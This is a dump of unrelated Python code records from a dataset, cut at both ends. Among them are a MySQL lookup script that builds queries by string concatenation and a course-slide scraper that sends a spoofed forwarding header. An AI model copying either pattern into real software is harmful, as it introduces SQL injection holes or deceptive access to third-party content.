sqAl_composite(CompositeCol, *sub_fields)\n elif field['typ'] in ('multi_select', 'multi_numeric'):\n specs = mf_specs[field['typ']]\n sub_fields = []\n for name, label in field['allowance']:\n fn = specs['format'] % (field['fieldname'], name)\n cf = sqAl.Column(fn, specs['db_col_type'], default=field['default'])\n dynclass_dict[fn] = cf\n sub_fields.append(cf)\n dynclass_dict[field['fieldname']] = sqAl_composite(CompositeCol, *sub_fields)\n elif field['typ'] in ('int', 'dropdown', 'enumber'): \n dynclass_dict[field['fieldname']] = sqAl.Column(field['fieldname'], sqAl.Integer, default=-1)\n\n return type(name, (Base,), dynclass_dict)\n\nParticipant = generate_class('Participant')\n\n\nif __name__ == '__main__':\n engine = sqAl.create_engine('sqlite:///%s' % wx.Config(CONFIG_MAIN_NAME).Read(CONFIG_DB_PATH_NAME), echo=True)\n Session = sqAl_sessionmaker(bind=engine)\n session = Session()\n\n # t = Participant(name='DynClass V.', \n # f29=CompositeCol(True,True,True,False,False,False,False,False,False,False,True,True,True,True),\n # f32=CompositeCol(14,21,28,0,0,0,0,0))\n # print session.add(t)\n p = session.query(Participant).filter(Participant.id == 2).first()\n p.mtpv = 2\n # p.name = 'Etre Petetre'\n # setattr(p,'f2', 28)\n # results = session.query(Participant).all()\n # for rec in results:\n # [setattr(rec, f['fieldname'], 0) for f in STRUCTURE.db_items if f['typ'] == 'dropdown' and getattr(rec, f['fieldname']) == -1]\n session.commit()\n # print dir(p)\n","sub_path":"participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"356164142","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport io\n\ntry:\n import docutils\nexcept ImportError:\n docutils = None # NOQA\n\nfrom acrylamid.readers import reststyle, markdownstyle, distinguish\n\n\nclass TestStyles(unittest.TestCase):\n\n @unittest.skipIf(docutils is None, 'no docutils available')\n def test_rest(self):\n\n header = [\"Header\",\n \"======\",\n \"\",\n \":date: 2001-08-16\",\n \":version: 1\",\n \":draft: True\",\n \":authors: foo, bar\",\n \":indentation: Since the field marker may be quite long, the second\",\n \" and subsequent lines of the field body do not have to line up\",\n \" with the first line, but they must be indented relative to the\",\n \" field name marker, and they must line up with each other.\",\n \":parameter i: integer\",\n \"\",\n \"Hello *World*.\"]\n\n i, meta = reststyle(io.StringIO('\\n'.join(header)))\n assert i == len(header) - 1\n\n assert 'foo' in meta['authors']\n assert meta['version'] == 1\n assert meta['date'] == '2001-08-16'\n assert 'second and subsequent' in meta['indentation']\n assert meta['draft'] is True\n\n def test_mkdown(self):\n\n header = [\"Title: My Document\",\n \"Summary: A brief description of my document.\",\n \"Authors: Waylan Limberg\",\n \" John Doe\",\n \"Date: October 2, 2007\",\n \"blank-value: \",\n \"base_url: http://example.com\",\n \"\",\n \"This is the first paragraph of the document.\"]\n\n i, meta = markdownstyle(io.StringIO('\\n'.join(header)))\n assert i == len(header) - 1\n\n assert 'John Doe' in meta['authors']\n assert meta['date'] == 'October 2, 2007'\n assert meta['blank-value'] == None\n\n\ndef testQuotes():\n\n assert distinguish('\"') == '\"'\n assert distinguish('\"\"') == ''\n\n assert distinguish('Foo\"') == 'Foo\"'\n assert distinguish('\"Foo') == '\"Foo'\n\n assert distinguish('\"Foo\" Bar') == '\"Foo\" Bar'\n assert distinguish('\"Foo Bar\"') == 'Foo Bar'\n\n assert distinguish(\"\\\"'bout \\\" and '\\\"\") == \"'bout \\\" and '\"\n","sub_path":"specs/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"368592084","text":"# coding: utf-8\nfrom sqlalchemy import create_engine\n\n\ndef checkdb(val1, val2,inkey):\n #key1= '1710240037'\n key1= inkey\n strsql='select u_id,repair_order_type from repair_order where repair_order_code = \\''\n strsql += key1\n strsql += '\\';'\n #print (strsql)\n rs = connection.execute(strsql)\n #print (rs.rowcount)\n data = rs.fetchone()\n #print(data)\n #print ('1 ok')\n if rs.rowcount > 0:\n str1=data[0]\n str2=data[1]\n #print (str1)\n strsql = 'select trouble_name,trouble_way from repair_trouble where repair_order_uid = \\''\n strsql += str1\n strsql += '\\' and repair_trouble_type = '\n strsql += '\\'回单\\''\n print (strsql)\n print ('2 ok')\n rs = connection.execute(strsql)\n if rs.rowcount > 0:\n data2 = rs.fetchone()\n print('3 ok')\n #print (data2)\n #print (data2[1])\n if data2[1]== '':\n print ('binggo')\n print(key1+'||'+data2[0]+'||'+str(data2[1]))\n h2.write(key1+'||'+data2[0]+'||'+str(data2[1])+'\\n')\n print ('finish------------------------')\n # strsql2='select out_bill_code from t_out_head where REPAIR_BILL_CODE = \\''\n # strsql2 += key1\n # strsql2 += '\\''\n # print(strsql2)\n # print ('3 ok')\n # list1=[]\n # rs = connection.execute(strsql2)\n # for row in rs:\n # print (row[0])\n # list1.append(row[0])\n # strsql3 = 'select product_name from t_out_sub where OUT_BILL_CODE = \\''\n # strsql3 += row[0]\n # strsql3 += '\\''\n # print (strsql3)\n # rs = connection.execute(strsql3)\n # print ()\n # for row2 in rs:\n # print (row2)\n # print (data2[0] + '|' + row2[0])\n\n\nh1=open('e:\\list3.txt','r')\nwq=\"mysql+pymysql://root@localhost:3306/track_db?charset=utf8\"\nh2 = open('e:\\list417.txt', 'a+')\nengine = create_engine(wq, max_overflow=3)\nconnection = engine.connect()\nconnection = connection.execution_options( isolation_level=\"READ COMMITTED\")\nfor r1 in h1:\n if r1.startswith('17'):\n s1=r1.replace('\\n','')\n #print (s1)\n checkdb(wq,\"五汽票务\",s1)\n\nconnection.close\nh2.close()","sub_path":"corp_sr/analize_zh/stage1.py","file_name":"stage1.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329613961","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nthis module defines tokenizing tools for us to use in leaner modules. \ntypically tokanizing take a long string, returns a collection of tokens\nthus any processing to get the long string should be done outside the tokenizing functions\n'''\n\nimport os \nimport numpy as np \nimport nltk \nfrom nltk.corpus import stopwords \nfrom collections import defaultdict \nimport re \n\nnltk_stop_words = set(stopwords.words('english'))\n\n# =============================== small methods/tools ==========================================================================\n\n# filter function for List_to_BOW\ndef Default_word_filter(word:str) -> bool: \n ''' by default, every word is counted'''\n return True \n\n# modifier function for List_to_BOW\ndef Default_word_modifier(word:str) -> str: \n ''' by default, words are not modified'''\n return word \n\n# converts a bag of words to a string for printing\ndef BOW_to_str(bow:dict, freq_order=True, top_k=-1, indent='') -> str: \n ''' This method turns a bow into user-friendly string for printing \n printing order can be by frequency, or by a-b-c if by freq is false \n the number of word to print out can be specified by top k \n default, all words are printed out, with the specified indent'''\n to_return = '' \n if freq_order:\n items = sorted(bow.items(), key=lambda x: x[1], reverse=True) \n else: \n items = sorted(bow.items(), key=lambda x: x[0]) \n \n for word, freq in items: \n to_return += indent \n to_return += word \n to_return += ' -> ' \n to_return += str(freq) \n to_return += os.linesep \n top_k -= 1 \n if top_k == 0: \n break \n return to_return\n \n\n'''============================================== methods to make long string from collections ================================================'''\n# concate a list of string into a long string \ndef Concatenate_str_list(str_list:list, random_order=False, splitter=os.linesep) -> str: \n ''' This function take a list of string, concatenate them into a long string \n random order means items are concatenated in random order \n splitter is what to put in between items in the long string''' \n if not random_order: \n to_return = splitter.join(str_list) \n return to_return\n else: \n index_arr = np.arange(len(str_list), dtype=int)\n index_arr = np.random.shuffle(index_arr) \n to_return = '' \n for i in index_arr: \n assert type(str_list[i]) == str, 'concatenating non string items' \n to_return += str_list[i] \n to_return += splitter \n return to_return \n \n\n'''=============================== this part is for methods long strings into lists ============================================================'''\n# simple tokenizer using nltk\ndef Simple_tokenizer(long_string:str, remove_stop_words=True, stop_words=nltk_stop_words, case_sensitive=False) -> list: \n ''' This module tokenize a long string, tokenize by white space, retaining marks such as question marks\n parameter options are whether to remove stop_words (from nltk module or specified otherwise), \n and whether it is case sensitive \n return value is a list of tokens made'''\n if not case_sensitive: \n long_string = long_string.lower() \n tokens = nltk.tokenize.word_tokenize(long_string) \n if remove_stop_words: \n to_return = [w for w in tokens if not(w in nltk_stop_words)] \n else: \n to_return = list(tokens) \n return to_return \n \n\n# default tokenizer that separate by space \ndef Default_tokenizer(long_string:str, stopwords={}, min_len=1) -> list: \n ''' this default tokenizer split sentence by white space, \n remove stop words from passed set, \n remove any token that is shorter than minimum length \n return the token list ''' \n return [i for i in long_string.split() if not((i in stopwords) or (len(i) str: \n ''' Takes a word, check for varies conditions, make modifications, return result, None if in stop words''' \n \n # match F, special case \n F = re.compile(\"^\\s[Ff]\\s$\") \n if re.match(F, word): \n return \"F\" \n # other than special cases, remove stop words\n if word in stop_words: \n return None\n # match question marks ???\n q_marks = re.compile(\"^\\?{2,}$\") \n if re.match(q_marks, word): \n return \"???\" \n # match exclmtn marks !!!\n exclmtn_marks = re.compile(\"^!{2,}$\") \n if re.match(exclmtn_marks, word): \n return \"!!!\" \n # match ??!?!??!? \n q_exc_marks = re.compile(\"^[!?]{2,}$\") \n if re.match(q_exc_marks, word): \n return \"!?\" \n # match variations of pog\n pog = re.compile(\"^p+o+g+$\") \n if re.match(pog, word): \n return \"pog\" \n # match variations of nice\n nice = re.compile(\"^n+i+c+e+u*|n+a+i+s+u+$\") \n if re.match(nice, word): \n return \"nice\" \n # match variations of noice \n noice = re.compile(\"^n+o+i+c+e+$\") \n if re.match(noice, word): \n return \"noice\" \n # match variations of haha \n haha = re.compile(\"^(ha){2,}h?$|h{3,}$\") \n if re.match(haha, word): \n return \"haha\" \n # match variations of lol \n lol = re.compile(\"^l+o+l+$\") \n if re.match(lol, word): \n return \"lol\" \n # match variations of lul \n lul = re.compile(\"^l+u+l+$\") \n if re.match(lul, word): \n return \"lul\" \n # match variations of lmao\n lmao = re.compile(\"^lmf?ao+$\") \n if re.match(lmao, word): \n return \"lmao\" \n # match variations of yes \n yes = re.compile(\"^y+e+s+$\") \n if re.match(yes, word): \n return \"yes\" \n # match variations of noo \n noo = re.compile(\"^n+o{2,}$\") \n if re.match(noo, word): \n return \"noo\" \n # match variations of no \n no = re.compile(\"^(no){2,}$\") \n if re.match(no, word): \n return \"no\" \n # match variations of yeah \n yeah = re.compile(\"^y+e+a+h*$|^ya$|^ye+$\") \n if re.match(yeah, word): \n return \"yeah\" \n # match variations of ree \n ree = re.compile(\"^r+e+$\") \n if re.match(ree, word): \n return \"ree\" \n # match variations of oof \n oof = re.compile(\"^o{2,}f+$\") \n if re.match(oof, word): \n return \"oof\" \n # match variations of pogu \n pogu = re.compile(\"^p+o+g+u+$\") \n if re.match(pogu, word): \n return \"pogu\" \n # xd \n xd = re.compile(\"^xd+$\") \n if re.match(xd, word): \n return \"xd\" \n # ez \n ez = re.compile(\"^e+z+$\") \n if re.match(ez, word): \n return \"ez\" \n # money \n money = re.compile(\"^mo+ne+y+$\") \n if re.match(money, word): \n return \"money\" \n \n return word \n \n\n# tokenize a sentence for embedding training, \ndef Embedding_tokenize(sentence:str, word_filter=Embedding_word_modifier, case_sensitive=False) -> list: \n ''' Tokenization customized to embedding, takes a sentence and returns a list of tokens''' \n # chech case sensitivity \n if not case_sensitive: \n sentence = sentence.lower() \n # make token pattern and match them\n token_pattern = \"\\s[Ff]\\s|[?!]{2,}|[:;]\\)|[^\\s',@.():?!]{2,}|\\w:|:\\w\\s\" \n token_pattern = re.compile(token_pattern) \n raw_tokens = re.findall(token_pattern, sentence) \n \n # put each token through a modifier, which also check for validity \n to_return = list()\n for token in raw_tokens: \n modified = Embedding_word_modifier(word=token) \n if modified!=None: \n to_return.append(modified) \n return to_return \n\n\n'''================================ methods for processing list of tokens into BOW (sets, dicts, etc) ============================================='''\n\n# converts list of tokens to bag of words\ndef List_to_bow(token_list:list, filter_func=Default_word_filter, modifier_func=Default_word_modifier, n_gram=1, connector=''): \n ''' takes a list of tokens, make them into a bag of words based on some conditions \n n grams will be conted, default is 1, they will be connected with connector string specified\n first, the raw word has to pass a filter, by default, all are passed \n second, the raw word is modified, by default, they remain the same \n ''' \n to_return = defaultdict(int) \n ngram_window = [] \n for token in token_list: \n assert type(token) == str, 'passed token not string' \n if not filter_func(token): \n continue \n ngram_window.append(modifier_func(token)) \n if len(ngram_window) < n_gram: \n continue\n if len(ngram_window) > n_gram: \n ngram_window.pop(0) \n for i in range(len(ngram_window)): \n word = connector.join(ngram_window[:i+1]) \n to_return[modifier_func(word)] += 1 \n \n\n while(len(ngram_window) > 0): \n ngram_window.pop(0)\n for i in range(len(ngram_window)): \n word = connector.join(ngram_window[:i+1]) \n to_return[modifier_func(word)] += 1 \n\n return to_return \n\n \n \n","sub_path":"Tokenizer_kit.py","file_name":"Tokenizer_kit.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359048079","text":"import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nimport datetime\nimport math\nimport gc\nimport time\nimport pickle\n\n\nprint()\nprint('This is [no drill] testing program.')\nprint()\nsince = time.time()\n# print_time = str(int(time.time()))\ndata_dir = '../data/'\nsave_dir = '../saves/'\ndf = pd.DataFrame()\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!\n\nmodel_name = '[]_0.6788_Light_gbdt_1512883008.model'\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!\nprint()\nprint('!'*60)\nprint()\nprint(' FAKE MODEL '*2)\nprint('loading model:', model_name)\nprint(' FAKE MODEL '*2)\nprint('check if its right.')\nprint()\nprint('!'*60)\nprint()\nmodel_name = model_name[:-6]\nmodel = pickle.load(open('../fake/saves/' + 'model/' + model_name + '.model', \"rb\"))\n\nprint('loading complete.')\n\nis_train = True\n# is_train = False\n# is_test = True\nis_test = False\n# barebone = True\nbarebone = False\n\non = False\n\n# on = [\n# 'msno',\n# 'song_id',\n# 'target',\n# 'source_system_tab',\n# 'source_screen_name',\n# 'source_type',\n# 'language',\n# 'artist_name',\n# 'song_count',\n# 'member_count',\n# 'song_year',\n# ]\n\n\ninner = [\n '[0.67982]_0.6788_Light_gbdt_1512750240.csv',\n '[0.62259]_0.6246_Light_gbdt_1512859793.csv'\n]\ninner = False\n\n\ndef insert_this(on_in):\n global df\n on_in = on_in[:-4]\n df1 = pd.read_csv('../saves/feature/'+on_in+'.csv')\n df1.drop('id', axis=1, inplace=True)\n on_in = on_in[-10:]\n df1.rename(columns={'target': on_in}, inplace=True)\n df = df.join(df1)\n del df1\n\n\ndef insert_this_test(on_in):\n global df\n on_in = on_in[:-4]\n df1 = pd.read_csv('../saves/submission/'+on_in+'.csv')\n df1.drop('id', axis=1, inplace=True)\n on_in = on_in[-10:]\n df1.rename(columns={'target': on_in}, inplace=True)\n df = df.join(df1)\n del df1\n\n\nif is_train:\n print('making new feature phase:')\n print('loading train set.')\n load_name = 'train_set'\n dt = pickle.load(open('../saves01/' + load_name + '_dict.save', \"rb\"))\n df = pd.read_csv('../saves01/' + load_name + \".csv\", dtype=dt)\n del dt\n df.drop('genre_ids', axis=1, inplace=True)\n if barebone:\n ccc = [i for i in df.columns]\n ccc.remove('target')\n df.drop(ccc, axis=1, inplace=True)\n\n if inner:\n for i in inner:\n insert_this(i)\n\n print('What we got:')\n print(df.dtypes)\n print('number of rows:', len(df))\n print('number of columns:', len(df.columns))\n\n if on:\n df = df[on]\n\n df.drop('target', axis=1, inplace=True)\n for col in df.columns:\n if df[col].dtype == object:\n df[col] = df[col].astype('category')\n\n print()\n print('on making feature:')\n print(df.dtypes)\n print('number of columns:', len(df.columns))\n print()\n\n X_test = df\n ids = df.index\n del df\n\n print('Making predictions...')\n\n p_test_1 = model.predict(X_test)\n\n if not is_test:\n del model\n\n print('prediction done.')\n print('creating new feature')\n subm = pd.DataFrame()\n subm['id'] = ids\n del ids\n subm['target'] = p_test_1\n del p_test_1\n subm.to_csv(save_dir + 'feature/FAKE_' + model_name + '.csv',\n index=False, float_format='%.5f')\n print('[complete] featuring, name:', 'FAKE_'+model_name + '.csv')\n\nif is_test:\n\n print('in test phase:')\n print('loading test set.')\n load_name = 'test_set'\n dt = pickle.load(open(save_dir + load_name + '_dict.save', \"rb\"))\n df = pd.read_csv(save_dir + load_name + \".csv\", dtype=dt)\n del dt\n\n if barebone:\n ccc = [i for i in df.columns]\n ccc.remove('id')\n df.drop(ccc, axis=1, inplace=True)\n if inner:\n for i in inner:\n insert_this_test(i)\n\n print('What we got:')\n print(df.dtypes)\n print('number of rows:', len(df))\n print('number of columns:', len(df.columns))\n\n if on:\n on.remove('target')\n on.append('id')\n df = df[on]\n\n for col in df.columns:\n if df[col].dtype == object:\n df[col] = df[col].astype('category')\n\n print()\n print('on test:')\n print(df.dtypes)\n print('number of columns:', len(df.columns))\n print()\n\n X_test = df.drop(['id'], axis=1)\n ids = df['id'].values\n del df\n\n print('Making predictions...')\n\n p_test_1 = model.predict(X_test)\n del model\n\n print('prediction done.')\n print('creating submission')\n subm = pd.DataFrame()\n subm['id'] = ids\n del ids\n subm['target'] = p_test_1\n del p_test_1\n subm.to_csv(save_dir+'submission/'+model_name+'.csv',\n index=False, float_format='%.5f')\n print('[complete] submission name:', model_name+'.csv.gz')\n\nprint()\nprint('test program complete.')\n\nprint()\ntime_elapsed = time.time() - since\nprint('[timer]: complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n\n\n","sub_path":"kaggle_song_git/code_box/VALIDATION_fake_feature_insert_V1001/fake_model_testing_V1001.py","file_name":"fake_model_testing_V1001.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"148768836","text":"from random import *\r\n\r\nliste = []\r\nfor i in range(20):\r\n x = randint(0, 20)\r\n liste.append(x)\r\nprint(liste)\r\n\r\nminimum = liste[0]\r\nfor element in liste:\r\n if element < minimum:\r\n minimum = element\r\nprint(minimum)","sub_path":"min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235187624","text":"import requests\nimport os\nimport re\n\nnowday = 1\nurlrule = \"http://resources.tmooc.cn/tctm/TTS/ttsPage/L1APy/L1APy_V01/Level_5/\"\nendurl = \"/COURSE/ppt.html\"\n\ndef download_img(img_url,name):\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'x-forward-for':'0.0.0.0'\n }\n r = requests.get(img_url, headers=header, stream=True)\n print('img status:' + str(r.status_code))\n if r.status_code == 200:\n open(name, 'wb').write(r.content)\n del r\n\nwhile True:\n pptrule = \"\"\n if nowday < 10:\n pptrule = \"DAY0\"+str(nowday) \n else:\n pptrule = 'DAY' + str(nowday)\n nowday+=1 \n res = requests.get(urlrule+pptrule+endurl)\n print(\"download \"+pptrule+\":\")\n print('html staus:' + str(res.status_code))\n if res.status_code != 200:\n print(\"No such file\")\n continue\n else:\n print(\"File acquired\")\n res.encoding = 'utf-8'\n r = res.text\n dpath = os.getcwd()\n os.mkdir(dpath+'\\\\'+pptrule)\n c = open(pptrule+'/'+pptrule+'.html','w+',encoding='utf-8')\n c.write(r)\n c.close()\n img_url_list = re.findall('',r)\n for img in img_url_list: \n download_img(urlrule+pptrule+'/COURSE/'+img,pptrule+\"/\"+img)\n print(\"done\")","sub_path":"tts/level5/autodownload.py","file_name":"autodownload.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486574353","text":"import tkinter as tk\nfrom tkinter import ttk\n\n\n\nclass MyButton(tk.Button):\n def __init__(self, master=None, *args, **kwargs):\n super(MyButton, self).__init__(master = None, *args, **kwargs)\n\n self.state = \"disabled\"\n self.text = \"1111\"\n self.configure(\"text\")\n\n\n\nclass MyGui(tk.Frame):\n def __init__(self):\n super(MyGui, self).__init__()\n self.addWidgets()\n\n self.pack()\n\n def addWidgets(self):\n btn = MyButton(self)\n btn.pack()\n\n\nif __name__ == \"__main__\":\n gui = MyGui()\n gui.mainloop()\n","sub_path":"temoTest.py","file_name":"temoTest.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"108145531","text":"class Lamborghini :\n def __init__(self, brand, model, year):\n self.brand = brand\n self.model = model\n self.year = year\n\n def start(self):\n print(\"Starting the car\")\n\n def stop(self):\n print(\"Stopping the car\")\n\nclass Gallardo(Lamborghini) :\n def __init__(self, cruisecontrolenabled, brand, model, year):\n Lamborghini.__init__(self, brand, model, year)\n self.cruisecontrolenabled = cruisecontrolenabled\n\n def display(self):\n print(self.cruisecontrolenabled)\n\n def start(self):\n print(\"Press the button\")\n\nclass Aventador(Lamborghini):\n def __init__(self, parkingassistenabled, brand, model, year):\n Lamborghini.__init__(self, brand, model, year)\n self.parkingassistenabled = parkingassistenabled\n\n def display(self):\n print(self.parkingassistenabled)\n\nG = Gallardo(True, \"Lamborghini\", \"Gallardo\", 2016)\nprint(G.cruisecontrolenabled)\nprint(G.brand)\nprint(G.model)\nprint(G.year)\n\nG.start()\nG.stop()\nG.display()\nG.start()\n\nA = Aventador(True, \"Lamborghini\", \"Aventador\", 2018)\nprint(A.parkingassistenabled)\nprint(A.brand)\nprint(A.model)\nprint(A.year)\n\nA.start()\nA.stop()\nA.display()\n\n'''By Ankush Chavan'''","sub_path":"Inheritance/Overriding.py","file_name":"Overriding.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274055487","text":"# Copyright 2017 Google Inc. All rights reserved.\n# Use of this source code is governed by the Apache 2.0 license that can be\n# found in the LICENSE file.\n\"\"\"Main entry point for interfacing with Chrome's remote debugging protocol\"\"\"\nimport base64\nimport gzip\nimport logging\nimport os\nimport Queue\nimport re\nimport subprocess\nimport time\nimport monotonic\nimport ujson as json\nfrom ws4py.client.threadedclient import WebSocketClient\n\nclass DevTools(object):\n \"\"\"Interface into Chrome's remote dev tools protocol\"\"\"\n def __init__(self, options, job, task, use_devtools_video):\n self.url = \"http://localhost:{0:d}/json\".format(task['port'])\n self.websocket = None\n self.options = options\n self.job = job\n self.task = task\n self.command_id = 0\n self.page_loaded = None\n self.main_frame = None\n self.is_navigating = False\n self.last_activity = monotonic.monotonic()\n self.dev_tools_file = None\n self.trace_file = None\n self.trace_enabled = False\n self.requests = {}\n self.nav_error = None\n self.main_request = None\n self.path_base = None\n self.support_path = None\n self.video_path = None\n self.video_prefix = None\n self.recording = False\n self.mobile_viewport = None\n self.tab_id = None\n self.use_devtools_video = use_devtools_video\n self.recording_video = False\n self.prepare()\n\n def prepare(self):\n \"\"\"Set up the various paths and states\"\"\"\n self.requests = {}\n self.nav_error = None\n self.main_request = None\n self.path_base = os.path.join(self.task['dir'], self.task['prefix'])\n self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"support\")\n self.video_path = os.path.join(self.task['dir'], self.task['video_subdirectory'])\n self.video_prefix = os.path.join(self.video_path, 'ms_')\n if not os.path.isdir(self.video_path):\n os.makedirs(self.video_path)\n\n def start_navigating(self):\n \"\"\"Indicate that we are about to start a known-navigation\"\"\"\n self.main_frame = None\n self.is_navigating = True\n\n def wait_for_available(self, timeout):\n \"\"\"Wait for the dev tools interface to become available (but don't connect)\"\"\"\n import requests\n ret = False\n end_time = monotonic.monotonic() + timeout\n while not ret and monotonic.monotonic() < end_time:\n try:\n response = requests.get(self.url, timeout=timeout)\n if len(response.text):\n tabs = response.json()\n logging.debug(\"Dev Tools tabs: %s\", json.dumps(tabs))\n if len(tabs):\n for index in xrange(len(tabs)):\n if 'type' in tabs[index] and \\\n tabs[index]['type'] == 'page' and \\\n 'webSocketDebuggerUrl' in tabs[index] and \\\n 'id' in tabs[index]:\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools Error: %s\", err.__str__())\n time.sleep(0.5)\n return ret\n\n def connect(self, timeout):\n \"\"\"Connect to the browser\"\"\"\n import requests\n ret = False\n end_time = monotonic.monotonic() + timeout\n while not ret and monotonic.monotonic() < end_time:\n try:\n response = requests.get(self.url, timeout=timeout)\n if len(response.text):\n tabs = response.json()\n logging.debug(\"Dev Tools tabs: %s\", json.dumps(tabs))\n if len(tabs):\n websocket_url = None\n for index in xrange(len(tabs)):\n if 'type' in tabs[index] and \\\n tabs[index]['type'] == 'page' and \\\n 'webSocketDebuggerUrl' in tabs[index] and \\\n 'id' in tabs[index]:\n if websocket_url is None:\n websocket_url = tabs[index]['webSocketDebuggerUrl']\n self.tab_id = tabs[index]['id']\n else:\n # Close extra tabs\n requests.get(self.url + '/close/' + tabs[index]['id'])\n if websocket_url is not None:\n try:\n self.websocket = DevToolsClient(websocket_url)\n self.websocket.connect()\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools websocket Error: %s\",\n err.__str__())\n if not ret:\n # try connecting to 127.0.0.1 instead of localhost\n try:\n websocket_url = websocket_url.replace('localhost', '127.0.0.1')\n self.websocket = DevToolsClient(websocket_url)\n self.websocket.connect()\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools websocket Error: %s\",\n err.__str__())\n else:\n time.sleep(0.5)\n else:\n time.sleep(0.5)\n except Exception as err:\n logging.critical(\"Connect to dev tools Error: %s\", err.__str__())\n time.sleep(0.5)\n return ret\n\n def close(self, close_tab=True):\n \"\"\"Close the dev tools connection\"\"\"\n if self.websocket:\n try:\n self.websocket.close()\n except Exception:\n pass\n self.websocket = None\n if close_tab and self.tab_id is not None:\n import requests\n requests.get(self.url + '/close/' + self.tab_id)\n self.tab_id = None\n\n def start_recording(self):\n \"\"\"Start capturing dev tools, timeline and trace data\"\"\"\n self.prepare()\n self.recording = True\n if self.use_devtools_video and self.job['video'] and self.task['log_data']:\n self.grab_screenshot(self.video_prefix + '000000.png')\n elif self.mobile_viewport is None and not self.options.android and \\\n 'mobile' in self.job and self.job['mobile']:\n # grab an initial screen shot to get the crop rectangle\n try:\n tmp_file = os.path.join(self.task['dir'], 'tmp.png')\n self.grab_screenshot(tmp_file)\n os.remove(tmp_file)\n except Exception:\n pass\n self.flush_pending_messages()\n self.send_command('Page.enable', {})\n self.send_command('Inspector.enable', {})\n self.send_command('Network.enable', {})\n if 'user_agent_string' in self.job:\n self.send_command('Network.setUserAgentOverride',\n {'userAgent': self.job['user_agent_string']}, wait=True)\n if 'headers' in self.job:\n self.send_command('Network.setExtraHTTPHeaders',\n {'headers': self.job['headers']}, wait=True)\n if len(self.task['block']):\n for block in self.task['block']:\n self.send_command('Network.addBlockedURL', {'url': block})\n if self.task['log_data']:\n self.send_command('Security.enable', {})\n self.send_command('Console.enable', {})\n if 'trace' in self.job and self.job['trace']:\n if 'traceCategories' in self.job:\n trace = self.job['traceCategories']\n else:\n trace = \"-*,blink,v8,cc,gpu,blink.net,disabled-by-default-v8.runtime_stats\"\n else:\n trace = \"-*\"\n if 'timeline' in self.job and self.job['timeline']:\n trace += \",blink.console,disabled-by-default-devtools.timeline,devtools.timeline\"\n trace += \",disabled-by-default-blink.feature_usage\"\n trace += \",toplevel,disabled-by-default-devtools.timeline.frame\"\n trace += \"devtools.timeline.frame\"\n if self.use_devtools_video and self.job['video']:\n trace += \",disabled-by-default-devtools.screenshot\"\n self.recording_video = True\n trace += \",blink.user_timing,netlog\"\n self.trace_enabled = True\n self.send_command('Tracing.start',\n {'categories': trace, 'options': 'record-as-much-as-possible'})\n now = monotonic.monotonic()\n if not self.task['stop_at_onload']:\n self.last_activity = now\n if self.page_loaded is not None:\n self.page_loaded = now\n\n def stop_recording(self):\n \"\"\"Stop capturing dev tools, timeline and trace data\"\"\"\n self.recording = False\n self.send_command('Inspector.disable', {})\n self.send_command('Page.disable', {})\n self.collect_trace()\n if self.task['log_data']:\n self.send_command('Security.disable', {})\n self.send_command('Console.disable', {})\n self.get_response_bodies()\n self.send_command('Network.disable', {})\n if self.dev_tools_file is not None:\n self.dev_tools_file.write(\"\\n]\")\n self.dev_tools_file.close()\n self.dev_tools_file = None\n\n def collect_trace(self):\n \"\"\"Stop tracing and collect the results\"\"\"\n if self.trace_enabled:\n self.trace_enabled = False\n video_prefix = self.video_prefix if self.recording_video else None\n self.websocket.start_processing_trace(self.path_base + '_trace.json', video_prefix)\n self.send_command('Tracing.end', {})\n start = monotonic.monotonic()\n # Keep pumping messages until we get tracingComplete or\n # we get a gap of 30 seconds between messages\n if self.websocket:\n logging.info('Collecting trace events')\n done = False\n no_message_count = 0\n while not done and no_message_count < 30:\n try:\n raw = self.websocket.get_message(1)\n if raw is not None and len(raw):\n no_message_count = 0\n msg = json.loads(raw)\n if 'method' in msg and msg['method'] == 'Tracing.tracingComplete':\n done = True\n else:\n no_message_count += 1\n except Exception:\n pass\n self.websocket.stop_processing_trace()\n elapsed = monotonic.monotonic() - start\n logging.debug(\"Time to collect trace: %0.3f sec\", elapsed)\n self.recording_video = False\n\n def get_response_bodies(self):\n \"\"\"Retrieve all of the response bodies for the requests that we know about\"\"\"\n import zipfile\n requests = self.get_requests()\n if requests:\n optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])\n # see if we also need to zip them up\n zip_file = None\n if 'bodies' in self.job and self.job['bodies']:\n zip_file = 